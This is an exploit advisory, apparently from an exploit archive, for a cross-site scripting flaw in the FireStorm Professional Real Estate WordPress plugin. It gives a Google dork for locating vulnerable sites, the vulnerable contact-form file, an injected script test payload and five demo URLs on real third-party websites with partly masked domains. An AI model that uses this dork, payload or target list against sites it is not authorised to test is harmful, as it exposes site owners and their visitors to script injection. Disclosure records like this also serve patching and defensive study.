#######################################################################
# Exploit Title : Wordpress FireStorm Professional Real Estate Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/firestorm-real-estate-plugin
#
# Date: 2013/09/28
#
# Vendor Homepage : http://wordpress.org
#
# Software Link : http://wordpress.org/plugins/fs-real-estate-plugin/
#
# Tested on: Windows
#
##############
# Exploit : Cross site scripting
#
# Location: wp-content/plugins/firestorm-real-estate-plugin/includes/listing_contact_form.php
#
# Metod : Post
#
# Scrpt For Test : "/><script>alert(1);</script>
#
##############
##############
# Demo:
#
# http://www.azeXs.com/wp-content/plugins/firestorm-real-estate-plugin/includes/listing_contact_form.php
#
# http://www.bauXeller.de/automatisierungsblog/wp-content/plugins/firestorm-real-estate-plugin/includes/listing_contact_form.php
#
# http://www.lonXru.com/realestate/wp-content/plugins/firestorm-real-estate-plugin/includes/listing_contact_form.php
#
# http://www.virtXople.co.uk/wp-content/plugins/firestorm-real-estate-plugin/includes/listing_contact_form.php
#
# http://www.picturesXd.co.uk/virtualpeople/wp-content/plugins/firestorm-real-estate-plugin/includes/listing_contact_form.php
#
##############
#
# Discovered By : ACC3SS
#
##############